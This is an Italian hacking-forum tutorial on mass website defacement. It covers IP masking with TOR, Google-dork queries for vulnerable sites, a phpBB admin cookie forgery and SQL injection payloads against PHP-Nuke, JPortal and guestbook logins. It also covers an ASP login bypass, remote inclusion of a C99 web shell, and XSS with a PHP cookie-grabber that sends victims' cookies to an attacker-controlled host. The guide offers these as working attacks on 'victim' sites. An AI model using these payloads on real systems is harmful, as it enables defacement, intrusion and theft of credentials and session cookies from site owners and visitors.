---->QUESTO E' IL MONDO DEGLI HACKER!<----

Benvenuti nel Forum. =D Saluti il vostro Admin Very Happy

    [Scopo informatico] Guida al MASS DEFACE [Scopo informatico]

    Condividere
    avatar
    Admin
    Admin
    Admin

    Messaggi : 109
    Reputazione : 0
    Data d'iscrizione : 27.03.10
    Località : A casa mia :D xD

    [Scopo informatico] Guida al MASS DEFACE [Scopo informatico]

    Messaggio Da Admin il Dom Mar 28, 2010 4:00 pm

    |♠ Guida al mass deface ♠|

    1° LEZIONE [ GENERALE/INTRODUTTIVA ]

    Allora... prima di iniziare a defacciare bisogna imparare il significato di questo termine , defacciare un sito significa hackerarlo, bucarlo, mettere alla luce i suoi Bugs ( dall'inglese insetti ) x poi segnalarli ....
    Questo procedimento necessita dell'utilizzo di varie tecniche ,sia difensive x proteggerci durante il deface, sia offensive x defacciare :

    TECNICHE DIFENSIVE = le tecniche difensive servono x proteggere i nostri dati personali e quindi x impedire all'amministratore del sito di identificarci e rintracciarci , quando navighiamo in rete , quando ci logghiamo su un sito , quando scambiamo dati all'interno di un ambiente network , probabilmente il nostro IP viene loggato ovvero memorizzato e grazie alle tecniche difensive noi nascondiamo il nostro indiritto IP.

    TECNICHE OFFENSIVE = le tecniche offensive invece servono x mettere alla luce bugs , questo si può fare in vari metodi ke spieghero + avanti ma x tenerci sul generale queste tecniche implicano spesso l'utilizzo di Exploits , Google Hacker etc ...

    2° LEZIONE [ PROXARCI ]

    In questa lezione vi spiegherò cm proxarvi ovvero cm mascherare il vostro indirizzo IP x quanto riguarda la porta 80 [HTTP] , io personalmente uso TOR e mi ci trovo bene (TOR è scaricabile nella zona download del mio sito ) . TOR necessita di una configurazione, dopo l'installazione bisogna andare (x quanto riguarda IE) in Opzioni internet -> Connessioni -> Impostazioni LAN -> selezionare "utilizza un server proxy ..." -> Avanzate -> in HTTP inserire prima localhost o 127.0.0.1 e nella porta 8118.
    X verificare se il programma x mascherare il vostro IP funzioni si vada su un sito ke mostra il vostro IP (Es.http://hackerz.altervista.org/ip.php) prima e dopo l'apertura del programma se l'indirizzo è cambiato vuol dire ke il programma funge, in caso contrario verificate la configurazione. [Sempre x quanto riguarda TOR ogni volta ke ci si vuole proxare bisogno ri selezionare nelle impostazioni lan "utilizza un server proxy..." e dopo di ke bisogna attivare prima TOR e poi Privoxy, se si lascia l'opzione selezionata e TOR disattivato internet nn fungerà è un po nosioso lo so Neutral ]
    L'unico punto a sfavore nel proxarci è che la connessione sara molto piu lenta del normale , le immagini nei siti web nn le visualizzerà correttamente (nn sempre) e nn vi accedera ad MSN [ solo xk TOR e Privoxy cambiano l'ip x mantenervi anonimi e MSN si disconnette appena l'ip viene modificato ]

    NOTATE BENE = NEL DEFACCIARE I SITI IL PROXARSI è FONDAMENTALE!!!

    3° LEZIONE [ GOOGLE HACKER ]

    In questa lezione parleremo di cm trovare siti web cn vulnerabilità utilizzando google, questo procedimento si chiama google hacking cioè la parte "oscura" di google....
    Infatti inserendo alcune stringhe chiamate query potrete trovare password , database contenenti qualsiasi tipi di dati etc...
    ECCO LE QUERY:

    intitle: Trova le pagine contenenti nel proprio titolo la parola chiave specificata
    Esempio: intitle:xhtml

    allintitle: Restituisce le pagine che contengono nel titolo tutte le parole specificate
    Esempio: allintitle:xhtml tutorials

    inurl: Limita i risultati alle pagine contenenti una determinata parola nell'URL
    Esempio: inurl:css

    allinurl: Limita i risultati alle pagine contenenti tutte le parole specificate nel proprio URL
    Esempio: allinurl:css design

    intext: Restituisce le pagine che contengono nel testo la parola chiave specificata
    Esempio: intext:blog

    allintext: Limita i risultati alla pagine che contengono nel testo tutte le parole specificate
    Esempio: allintext:eric meyer

    link: Ricerca le pagine Web che contengono collegamenti al link specificato
    Esempio: link:www.html.it

    inanchor: Ricerca negli anchor dei link presenti nelle pagine
    Esempio: inanchor:linux

    site: Restringe la ricerca ad un sito o ad un dominio di livello superiore
    Esempi: site:com o site:it o site:www.redhat.com

    cache: Trova una copia della pagina che Google ha indicizzato nella propria cache. Utile quando le pagine non sono più online
    Esempio: cache:www.nomesito/nomepagina.htm

    filetype: o ext: Limita i risultati ad un documento avente una determinata estensione di file (.doc, .pdf, .rtf, .pl, .sh, .xls, eccetera). Esempio: filetype:pl

    define: Fornisce la descrizione di un termine ed i link ad esso correlati
    Esempio: define:worm

    related: Cerca pagine simili o affini alla pagina specificata
    Esempio: related:www.html.it

    info: Si ottengono ulteriori informazioni e link su un URL specificato. Fondamentale per tale descrizione è l'uso accorto dei metatag
    Esempio: info:www.w3.org

    (Nota bene: non devono esservi spazi fra i due punti e la parola chiave specificata. Google non è case-sensitive, quindi è indifferente rispettare le maiuscole e le minuscole.)

    QUERY + COMUNI X TROVARE VULNERABILITA :

    allinurl:admin.php site:.edu
    filetype: .ps, .xls, .txt, .ppt, .asp, ...
    "Index of /password"
    "Index of /admin"
    "Index of /root"
    inurl:loginadmin.asp
    inurl:adminlogin.asp
    allintitle: "index of/admin"
    intitle:"Index of" passwd passwd.bak
    intitle:"Index of" default.asp
    intitle:"Index of" htimage.exe
    intitle:index.of passlist
    intitle:"Index of" .bash_history
    intitle:"Index of" .sh_history
    intitle:"Index of" fpcount.exe
    intitle:"Index of" default.asp
    intitle:"Index of" stats.html
    "powered by openbsd" +"powered by apache"
    "Powered by phpBB 2.0.0"


    4° LEZIONE [ DEFACCIARE FORUM PHPBB ]

    Allora inizamo a studiare una la prima tecnica è molto semplice Wink e serve x defacciare i forum PHPBB
    semplicemente cambiando il codice guest dell'admin nel file dei cookies
    X defacciare forum PHPBB esiste anke un programma di nome PHPBB DEFACER ke defaccia forum cn versione inferiore alla 2.0.10 in cui vi è questo bug ( Programma scaricabile nella sezione download del mio sito ).
    Allora innanzi tutto bisogna cercare forum vulnerabili come fare ? ricordate la lezione precedente riguardante google hacker bene ora ci serve Smile
    andate su google e scrivete Powered by phpbb 1.0.12
    Ah 1 consiglio x esperienza personale i link cn + probabilita di deface sono ad esempio :
    www.forumvittima.it/index.php e www.forumvittima.it/index.php?eccecc quando li trovate cosi togliete tutto cio che c'è dopo il ? e tornate alla index
    adesso andate nei vostri cookies e cercate il nome del forum che volete defacciare appena aperto dovrebbe esserci una stringa del tipo phpbb2mysql_data e affianco un codice ke può variare voi tagliate quel codice e ci inserite

    a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid%22%3A1222%227D

    [ se ne codice guest trovate gia questa stringa vuol dire che il forum nn è vulnerabile e niente da fare ]
    ora salvate e chiudete tutte le pagine internet aperte in modo tale da far aggiornare i cookies
    dopo di che riaprite il forum e dovreste essere loggati cm admin:))
    A volte vi sono dei problemi ovvero l'amministratore del sito potrebbe inserire x motivi di sicurezza un'altro account admin senza poteri e quindi nn potrete fare nulla.
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    @ UN PO DI TEORIA @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    Penso che vi sarete chiesti , ma questo codice cm fa a farci loggare cm admin ? se nn ve lo siete chiesti vi rispondo lo stesso Razz vedete dove c'è scritto autologinid bene la stringa successiva attiva la modalita autologin mentre la stringa successiva a userid (penso che lo abbiate intuito ) si tratta dell'id dell'account admin Smile facile questa vero ? ora passiamo ad altro

    5° LEZIONE [ DEFACCIARE SITI PHP-NUKE ]

    Adesso spiegherò cm defacciare siti php-nuke tramite un attakko sql-inject
    (l'sql-inject è l'inserimento di codice sql grazie al quale si ottengono dati come password etc )
    in questo caso dopo l'inserimento della stringa sql il sito dovrebbe darci le password criptate in md5 degli admin del sito
    mettiamo tutto in pratica Smile
    cerchiamo tramite google hacker siti potenzialmente vulnerabili cn varie stringhe es:
    inurl:index.php?name=Search
    inurl:index.php?action=Search
    inurl:modules.php?name=Search
    etc etc...
    una volta trovato l'elenco dei siti aprendoli vi dovrebbe visualizzare il modulo di ricerca del sito ( l'admin potrebbe disattivare i moduli di un sito quindi se appena aprite la pagina viene fuori una scritta del tipo Modulo non attivo nn si puo sfruttare questo bug ) voi inserite questa stringa :
    p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
    e clikkate su cerca, se l'attakko è andato a buon fine il sito vi dovrebbe restituire una pagina cn le password criptate in md5
    ok...ma se nn ha funzionato ?
    bene se nn ha funzionato vuol dire che il sito nn è vulnerabile ad attakki nel modulo search e quindi proviamo cn un'altro modulo vulnerabile cm il modulo top10
    facciamo la stessa cosa di prima...
    google hacker inserendo le strighe ad esempio:
    inurl:modules.php?name=Top
    inurl:index.php?name=Top
    etc etc...
    una volta trovato il sito della prossima vittima inserite affianco al link questa stringa:
    &querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors
    quindi il link finale risulterà :
    www.sitoesempio.com/modules.php?name=top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors
    adesso se tutto ha funzionato correttamente nella pagina dei sondaggi dovremmo trovare le md5
    ATTENZIONE:
    A VOLTE DOPO INSERITA QUESTA STRINGA IL SITO RISPONDE CN SCRITTE DEL TIPO OPERAZIONE ILLEGALE , VERRANNO CONTATTATE LE AUTORITA E COSE DEL GENERE MA STATE TRANQUILLI NN è NIENTE DI GRAVE...ALMENO DI SOLITO... Wink
    Ma se anke questo metodo nn funzionasse ?
    beh si puo sempre provare cn un altro metodo , meno "produttivo" di qll precedenti xk cn questo bug è possibile rubare i cookie dell'admin ma di solito appena vengono trovate queste vulnerabilita ci si limita a segnalare , questo attakko si chiama XSS Cross Site Scripting [spiegato meglio + avanti]
    2 moduli di PHP-NUKE sono vulnerabili a questo attakko qll dei Downloads e qll dei Web_Links (se nn sono gia stati fixati)
    Andando nelle pagine di questi 2 moduli si troverà una cosa in comune , entrambi hanno un text x la ricerca , inserendo all'interno di questo text un iframe è possibile effettuare un attakko XSS...adesso mi spiego meglio...
    prima di tutto bisogna creare un file cn dentro una stringa simile a questa :
    <script>alert("lordhalo");</script>
    salvate il file cm un file immagine e caricatelo su uno spazio web
    nel nostro esempio carikeremo il file XSS.gif (cn dentro lo script) sul mio spazio altervista ovverowww.lordhalo.altervista.org
    adesso nn ci resta che creare la stringa iframe che in questo caso sarà :
    <iframe src=http://www.lordhalo.altervista.org/XSS.gif>
    cioè l'iframe fa in modo di caricare nella pagina l'immagine cn dentro lo script e se il sito sara vulnerabile vi stamperà a schermo lo script eseguendolo e in questo caso verrà fuori una schermata cn scritto lordhalo (testo ovviamente modificabile)
    tutto ciò che rigurda gli attakki XSS verra spiegato + avanti in un capitolo ,a loro, interamente dedicato.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    @ UN PO DI TEORIA @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    L'SQL Inject è una tecnica hacker k attakka tutte le applicazioni web che si basano su un database SQL.
    L'attakkante utilizza alcune query SQL inviate alla pagina del sito web vulnerabile x ottenere dati come password etc.


    6° LEZIONE [ ASP INJECT ]---------

    Ekkoci giunti fin qui...
    Questa tecnica tra l'altro molto semplice serve x defacciare siti ASP
    Come prima cosa bisogna trovare pagine di login dell'admin in siti ASP
    quindi cm al solito alla ricerca !! questa volta utiliziamo le stringhe
    inurl:loginadmin.asp
    inurl:adminlogin.asp
    inurl:adminadmin.asp
    inurl:amministrazionelogin.asp
    etc etc
    una volta trovata la pagine si inserisce:
    user: admin [o qll che si vuole xk la stringa User è indifferente]
    pass:' or '
    oppure
    pass:'or'
    è la stessa cosa...
    se il sito è vulnerabile dovreste essere loggati cm admin
    *SU QUESTA TECNICA HO FATTO UN VIDEO TUTORIAL SCARIKABILE SUL MIO SITO

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    @ UN PO DI TEORIA @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    Questa tecnica fa parte della classificazione
    SQL Inject

    7° [ LEZIONE SCANNERIZZARE/RACCOGLIERE INFO ]

    Bene iniziamo prima di tutto dobbiamo trovare l'ip del server su cui è hostato il sito da defacciare
    cm si fa ?
    basta aprire il prompt di DOS (START->ESEGUI scrivete CMD)
    e mettendo il caso che il sito da defacciare sia www.pippoclub.it nel prompt dovete digitare:
    ping pippoclub.it
    oppure
    ping www.pippoclub.it

    e lui vi restituira una pagina cn scritte simili a queste :
    Esecuzione di Ping pippoclub.it [ 123.45.6.78] con 32 byte di dati :
    Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
    Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
    Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X
    Risposta da 123.45.6.78: byte=32 durata=Xms TTL=X

    N.B:
    -logicamente 123.45.6.78 è un IP a caso ma dopo l'esecuzione del ping è quello l'IP che dovrete prendere
    -le X sostituiscono dei numeri che possono variare e Xms sarebbe la durata del ping in millisecondi

    adesso ottenuto l'ip che fare ?
    beh semplice bisogna cercare maggiori info possibili sul sito eseguendo un WHOIS
    Con il WHOIS è possibile prendere i dati riguardanti il dominio del sito visto che tutti i domini a pagamento sono registrati
    eseguire un WHOIS è molto semplice basta cercare un sito che offra questa possibilita e inserirvi i dati che abbiamo in questo caso l'ip
    e ora avrete ottenuto dei dati sul sito vittima alcuni utili alcuni meno in caso contrario provate a cambiare database
    dopo questo passaggio (nn fondamentale) dobbiamo disperatamente ottenere altri dati riguardanti la sicurezza e le falle del sito cm fare ?
    ci sono 2 modi
    -scannerizzare il sito cn programmi che rilevano bug
    -port scanner ( spero che sappiate tutti che cos'è e cm funge senno lasciate xdere!)
    Cn il primo è possibile ottenere i bug del sito e sfruttarli ma in caso contrario ? cioè se il programma nn trovasse bug ? in tal caso bisogna passare alla seconda opzione
    eseguiamo una scannerizzazione del sito e verifichiamo le porte aperte
    adesso mettiamo il caso che il server del sito abbia queste porte aperte

    21 - FTP

    80 - HTTP

    139 - NETBIOS SESSION

    445 - Microsof Ds

    in questo caso dobbiamo cercare un modo x sfruttarle e cm fare ? beh ci sono sempre i metodi tradizionali attakkare tramite netbios , ftp etc etc..
    ma se questo nn funziona ? in questo caso utilizzeremo gli EXPLOITS !!
    (spero che sappiate tutti che cosa sono gli exploits e ke abbiate delle nozioni fondamentali su di essi)
    ma cm trovarli ? semplicissimo andate su siti cm www.milw0rm.com e cercate exploit che fanno al caso vostro grazie alle informazioni ricavate cn il WHOIS il port scanner e l'analisi cn il software cerca bug nn dev'essere difficile Wink
    una volta trovati provate,provate e riprovate Wink


    8° LEZIONE [ RFI ]

    In questo capitolo si parla di RFI !! (Remote File Inclusion)(Remote File Include)
    quindi utilizzare l'inclusione di file sfruttando spesso variabili nn sicure...
    La C99 è una shell fatta in php che una volta inserita in un sito web vi dara la possibilita di avere davanti un pannello FTP cn molte opzioni
    innanzitutto
    bisogna uppare la shell su un vostro sito rinominandola in: (dopo spieghero il xk)
    shell.jpg
    C99.txt
    shelc99.gif
    insomma cm volete tranne che .PHP
    adesso dovete cercare siti vulnerabili e cm al solito google è un buon amico Smile
    Query di Es.
    Inurl:index.php?Conf=
    una volta trovata la lista di siti apritene uno e inserite dopo "Conf=" (la variabile) il link della shell
    ipotizzando che il link della shell sia www.miosito.com/c99.dat
    Es.
    www.sitovittima.it/index.php?Conf=www.miosito.com/c99.jpg
    e cosi dovreste avere la pag cn la c99 davanti !!!
    pikkola parentesi Conf è una variabile cm un'altra e index.php è la pagina principale nel sito , inserendo quel url si "carichera" la shell all'interno della pagina
    se volete avere maggiori info sugli url andate su www.milw0rm.com/search/ e inserite la stringa remote file inclusion oremote file include
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    @ UN PO DI TEORIA @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    L'estensione della shell nn dev'essere php xk noi
    vogliamo che una volta inserito il link della shell
    sia eseguita sul sito della vittima e nn interpretata


    9° LEZIONE [ JPORTAL ]

    In questo capitolo ci occuperemo dei siti in JPORTAL!
    cerchiamo siti vulnerabili cn google
    basta inserire
    POWERED BY JPORTAL
    apritene uno e inserite affianco al sito:

    print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
    Es.
    www.sitovittima.it/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
    Nella X va inserito il numero dell'ID del utente di cui si vuole trovare la pass (in questo caso l'admin) che di solito è 1,2,3,4,5,6,7
    Nn dubito della vostra intelligenza ma preferisco spericificare ankora meglio cn un'altro esempio finale;))
    Es.1
    www.sitovittima.it/print.php?what=article&id=1 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
    Es.2
    www.sitovittima.it/print.php?what=article&id=2 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
    Es.3
    www.sitovittima.it/print.php?what=article&id=3 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
    se il sito è vulnerabile dovrebbe uscire na pagina cn l'user e pass del'ID che abbiamo inserito nn hasate
    Il resto è intuibile...no?(ihih)
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    @ UN PO DI TEORIA @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @
    Anke questo attakko fa parte della classificazione
    SQL Inject

    10° LEZIONE [ DEFACCIARE I GUESTBOOK ]

    Questa vulnerabilita è molto simile a qll nelle piattaforme ASP
    Cm al solito cercate pagine vulnerabili cn google
    Query:
    inurl:guestbook/admin/login.php
    inurl:guestbook/admin.php
    Poi usate un po di fantasia...
    Alla schermata di login dell'admin del guestbook inserite questi dati:
    USER: 'or 'jr7'='jr7' /*
    PASSWORD: qualsiasi
    In questo caso, al contrario dell SQL Inject sulle piattaforme ASP, la stringa nulla è qll della password
    A questo punto se il sito sara' vulnerabile vi troverete di fronte il pannello di amministrazione del guestbook


    11° LEZIONE [ ATTAKKO XSS ]

    In questo capitolo ci occuperemo del bug XSS!
    prima un po di teoria l'attakko XSS o CSS significa Cross Site Scripting , viene chiamato XSS xk ci si potrebbe confondere cn il CSS che sarebbe Cascading Style Sheets , che assolutamente nn centra nulla , l'attakko viene spesso effettuato a motori di ricerca , i quali (quelli kn il bug) una volta inserita la stringa da ricercare la stampano direttamente a pagina senza "filtrarla" ad Es.
    se io volessi cercare CIAO BELLO in un motore di ricerca e nn trovassi niente la pagina risponderebbe
    Non è stato trovato alcun risultato con la parola CIAO BELLO
    e in questo caso sara possibile inserire al posto della stringa CIAO BELLO un javascript Smile)
    adesso ricapitoliamo Smile)
    Mettiamo il caso di aver trovato un sito potenzialmente vulnerabile e vorremmo approfittarne, cm fare? basta inserire nella stringa della ricerca un javascript
    Es.
    <script language=JavaScript> window.alert("LoRdHaLo"); </script>
    in caso di presenza del bug una volta avviata la ricerca vi si aprira una finestra a stile alert cn scritto LoRdHaLo ( testo ovviamente modificabile)
    cn la presenza di questo bug nn solo è possibile far aprire qll finestrina ma è possibile reindirizzare il visitatore della pagina su altri siti a nostro piacimento , magari siti che rubano cookies e/o loggano l'IP ecc
    Adesso spieghero cm utilizzare una vulnerabilita di questo tipo eseguendo un Cookies Grabber
    Inserire in un pagina PHP questo codice :
    <?PHP
    $cookie = $_GET['data'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("j F, Y, g:i a");
    $referer=getenv ('HTTP_REFERER');
    $fp = fopen('cookies.txt', 'a');
    fwrite($fp, 'Cookie: '.$cookie.'
    IP: ' .$ip. '
    Date and Time: ' .$date. '
    Referer: '.$referer.'


    ');
    fclose($fp);
    ?>
    Ovvero questa pagina una volta aperta loggera i cookies e l'IP della vittima in un file di nome cookies.txt...
    Adesso salviamo la pagina cn il nome di cookie.php e uppiamola sul nostro sito in questo caso www.sitomio.net
    Dopo aver inserito lo script : <script language=JavaScript> window.alert("SIOUX83"); </script>
    Il link della pagina dovrebbe essere simile a questo
    www.sitovittima.com/ricerca.php?keywords=<script language=JavaScript> window.alert("LoRdHaLo"); </script>
    ma cm redirezionare la vittima sulla pagina in modo da rubargli i cookie ?
    beh semplice, innanzitutto dobbiamo creare il link da dare alla vittima sostituendo il javascript <script language=JavaScript> window.alert("LoRdHaLo"); </script> cn questo
    <script language="JavaScript"> window.location="http://www.sitomio.net/cookie.php?cooked="+document


    Salut Admin!
    Shocked Mi fanno male le mani >.<

      La data/ora di oggi è Mer Apr 26, 2017 7:11 am